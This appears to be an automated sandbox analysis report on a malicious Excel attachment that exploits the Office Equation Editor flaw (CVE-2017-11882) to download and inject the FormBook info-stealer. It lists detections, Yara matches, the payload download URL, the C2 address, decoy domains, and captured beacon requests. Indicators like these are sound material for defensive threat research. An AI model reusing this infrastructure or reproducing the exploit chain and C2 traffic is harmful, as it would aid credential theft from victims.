Windows Analysis Report
Vecchio debito_SKTGH_465585484754.xlsx

Overview

General Information

Sample Name: Vecchio debito_SKTGH_465585484754.xlsx
Analysis ID: 562488
MD5: 3ecca47c8fd3d3fe23e3de46298b346c
SHA1: 0bed1382da7ffeaf9aa0aa28e9143cffc0ec606d
SHA256: 6f401d7546fc2bd85b659a1d30a89bf21451e327e2712ab86f1a3dec421b7e64
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.drmichaelirvine.com/yrcy/"], "decoy": ["ordermws-brands.com", "jkbswj.com", "dairatwsl.com", "lewismiddleton.com", "hevenorfeed.com", "kovogueshop.com", "cyberitconsultingz.com", "besrbee.com", "workerscompfl1.com", "wayfinderacu.com", "smplkindness.com", "servicesitcy.com", "babyvv.com", "fly-crypto.com", "chahuima.com", "trist-n.tech", "minjia56.com", "oded.top", "mes-dents-blanches.com", "nethunsleather.com", "onlinesindh.com", "genrage.com", "bhalawat.com", "5gwirelesszone.com", "semejnyjochag.com", "shopvintageallure.com", "laqueenbeautybar.supplies", "hominyprintingmuseum.com", "taksimbet13.com", "fairytalesinc.com", "loversscout.com", "nxn-n.com", "lovebydarius.store", "mintnft.tours", "snowjamproductiosmedia.com", "boraviajar.website", "cryptointelcenter.com", "m2momshealth.com", "perfectionbyinjection.com", "cletechsolutions.com", "skin4trade.com", "a9d7c19f0282.com", "waltersswholesale.com", "lendsoar.com", "virginialandsforsale.com", "shinepatio.com", "nba2klocker.team", "picturebookoriginals.com", "chatteusa.com", "bodevolidu.quest", "certidaoja.com", "scgxjp.com", "cbd-cannabis-store.com", "kadinisigi.com", "vacoveco.com", "hostedexchangemaintainces.com", "hf59184.com", "jingguanfm.com", "browsealto.com", "kymyra.com", "xrgoods.com", "dtsddcpj.com", "uptimisedmc.com", "redsigndesign.com"]}
Source: Vecchio debito_SKTGH_465585484754.xlsx Virustotal: Detection: 39%
Source: Vecchio debito_SKTGH_465585484754.xlsx ReversingLabs: Detection: 32%
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://103.167.92.57/CRC/vbc.exe Avira URL Cloud: Label: malware
Source: www.drmichaelirvine.com/yrcy/ Avira URL Cloud: Label: malware
Source: dairatwsl.com Virustotal: Detection: 7%
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Source: 5.0.vbc.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.477475563.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.514399498.0000000000910000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.478435499.0000000000600000.00000004.00000800.00020000.00000000.sdmp, cscript.exe
Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CharUnicodeIn.pdb source: vbc.exe
Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: global traffic DNS query: name: www.hevenorfeed.com
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.167.92.57:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 60MB

Networking

Source: C:\Windows\explorer.exe Network Connect: 162.241.244.46 80
Source: C:\Windows\explorer.exe Network Connect: 206.188.192.2 80
Source: C:\Windows\explorer.exe Network Connect: 216.177.167.5 80
Source: C:\Windows\explorer.exe Domain query: www.laqueenbeautybar.supplies
Source: C:\Windows\explorer.exe Domain query: www.dairatwsl.com
Source: C:\Windows\explorer.exe Domain query: www.vacoveco.com
Source: C:\Windows\explorer.exe Domain query: www.hevenorfeed.com
Source: Malware configuration extractor URLs: www.drmichaelirvine.com/yrcy/
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: DEFENSE-NETUS
Source: global traffic HTTP traffic detected: GET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A== HTTP/1.1Host: www.hevenorfeed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /yrcy/?aN=e/RF5Wkvcu2kD6Q92hYVOLL0JiY85m+wPQ7mJBVhAbkMJKQBASQfBcFHsaVDtw323W8DmA==&jdfhnl=EvxTDFUPJ2-xUnMP HTTP/1.1Host: www.dairatwsl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=v3r6hW97z/ZOf9TDdHCkxkGayxrL9igaQBwyCSAaMVPNp+0Lw1V9xr9SflbU5XGqGaZNIw== HTTP/1.1Host: www.laqueenbeautybar.suppliesConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 103.167.92.57
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 21:47:30 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Fri, 28 Jan 2022 10:19:01 GMTETag: "c2800-5d6a1c37988f5"Accept-Ranges: bytesContent-Length: 796672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 9a c1 f3 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 1a 0c 00 00 0a 00 00 00 00 00 00 5e 38 0c 00 00 20 00 00 00 40 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0c 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 0c 00 4b 00 00 00 00 60 0c 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0c 00 0c 00 00 00 c1 37 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 0c 00 00 20 00 00 00 1a 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 40 0c 00 00 02 00 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 05 00 00 00 60 0c 00 00 06 00 00 00 20 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0c 00 00 02 00 00 00 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: GET /CRC/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.167.92.57Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://blog.iandreev.com
Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://blog.iandreev.com/
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.555506199.0000000001BE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.499381564.0000000003E50000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.555506199.0000000001BE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.501167132.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.560110260.00000000083F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.484447982.000000000447A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.501167132.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.560110260.00000000083F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.484447982.000000000447A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E50395A7.emf
Source: unknown DNS traffic detected: queries for: www.hevenorfeed.com

E-Banking Fraud

Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2564dd8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2505e58.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Screenshot number: 4 Screenshot OCR: document is protected 16 17 ~ 18 19 20 21 22 Open the document in If thts document was 23 Mi
Source: Screenshot number: 4 Screenshot OCR: protected documents the yellow bar above )1 " F' 0 32 0 0 33 34 35 0 0 36
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
